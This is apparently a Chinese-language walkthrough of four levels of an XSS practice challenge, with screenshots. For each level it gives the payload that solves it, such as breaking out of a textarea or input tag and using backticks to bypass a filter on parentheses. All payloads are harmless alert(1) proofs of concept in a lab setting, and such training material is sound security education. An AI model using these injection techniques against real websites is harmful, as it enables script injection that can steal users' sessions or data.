0x00
这里没有过滤,所以直接输入<script>alert(1)</script>
![在这里插入图片描述](https://img-blog.csdnimg.cn/b0c4eb4ba81f40e6914078cd38f81378.png)
0x01
这里有<textarea>
标签,因为<textarea>
里会有HTML解码操作,但不会有子元素,所以要跳出这个标签就可以
![在这里插入图片描述](https://img-blog.csdnimg.cn/ef4a86cb5f7443b1997bfa8cee0a8c9c.png)
要在执行内容前跳出这个标签,输入</textarea><script>alert(1)</script>
![在这里插入图片描述](https://img-blog.csdnimg.cn/0569a2fa150348a4a20e78b44e433575.png)
0x02
这里有input
标签,所以也要先跳出该标签
![在这里插入图片描述](https://img-blog.csdnimg.cn/faa4e1817826405e974acc19ebfdd111.png)
输入"><script>alert(1)</script>
![在这里插入图片描述](https://img-blog.csdnimg.cn/e8809f060b5247cd9dda7223f3f8fef8.png)
0x03
这里是过滤了(),所以要使用反引号
![在这里插入图片描述](https://img-blog.csdnimg.cn/d2a8b204a835478c822695133a820113.png)
输入
<script>alert`1`</script>